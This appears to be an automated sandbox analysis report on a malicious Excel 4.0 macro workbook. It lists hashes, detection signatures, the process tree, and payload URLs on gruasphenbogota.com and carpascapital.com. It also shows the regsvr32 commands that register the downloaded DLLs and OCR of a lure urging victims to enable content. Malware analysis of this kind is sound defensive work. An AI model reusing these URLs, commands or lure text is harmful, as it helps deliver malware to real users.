Loading ...

Play interactive tourEdit tour

Windows Analysis Report plan-277786552.xlsb

Overview

General Information

Sample Name:plan-277786552.xlsb
Analysis ID:439114
MD5:1ab505496be60c9ec06e78052d5cf557
SHA1:2a2602511286c90591824cf91b1027f20e537212
SHA256:af9ed7ee18c789857f7356314109cf0635f6905afc9a6ad74f8742c78d46b446
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to load missing DLLs

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 1056 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 3840 cmdline: regsvr32 ..\gihi1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5988 cmdline: regsvr32 ..\gihi2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\gihi1.dll, CommandLine: regsvr32 ..\gihi1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1056, ProcessCommandLine: regsvr32 ..\gihi1.dll, ProcessId: 3840

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: https://gruasphenbogota.com/C74hwGGxi/ka.htmlAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: https://gruasphenbogota.com/C74hwGGxi/ka.htmlVirustotal: Detection: 6%Perma Link
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.3:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.3:49720 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
Source: global trafficDNS query: name: carpascapital.com
Source: global trafficTCP traffic: 192.168.2.3:49718 -> 50.116.92.246:443
Source: global trafficTCP traffic: 192.168.2.3:49718 -> 50.116.92.246:443
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: carpascapital.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.aadrm.com/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.cortana.ai
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.office.net
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.onedrive.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://augloop.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: intlsheet1.binString found in binary or memory: https://carpascapital.com/gBPg8MtsGbv/ka.html
Source: intlsheet1.binString found in binary or memory: https://carpascapital.com/gBPg8MtsGbv/ka.html%
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://cdn.entity.
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://clients.config.office.net/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://config.edge.skype.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://cortana.ai
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://cortana.ai/api
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://cr.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://dev.cortana.ai
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://devnull.onenote.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://directory.services.
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://graph.windows.net
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://graph.windows.net/
Source: intlsheet1.binString found in binary or memory: https://gruasphenbogota.com/C74hwGGxi/ka.html
Source: intlsheet1.binString found in binary or memory: https://gruasphenbogota.com/C74hwGGxi/ka.html%
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://lifecycle.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://login.windows.local
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://management.azure.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://management.azure.com/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://messaging.office.com/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://ncus.contentsync.
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://officeapps.live.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://onedrive.live.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://outlook.office.com/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://outlook.office365.com/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://settings.outlook.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://staging.cortana.ai
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://tasks.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://wus2.contentsync.
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.3:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.3:49720 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to uk jCt. The specified module could not be found. 15 ,, 0 ProtectedView Thisf
Source: Screenshot number: 4Screenshot OCR: Enable content" to perfc 19 the decryption of the document. 20 21 0 SecurityWarning Macros have b
Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Screenshot number: 8Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: plan-277786552.xlsbInitial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: plan-277786552.xlsbInitial sample: Sheet size: 22026
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: classification engineClassification label: mal84.expl.evad.winXLSB@5/4@2/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{FC2C4461-80B4-420E-AF0D-F34C00A48E36} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi2.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi2.dll
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: plan-277786552.xlsbInitial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
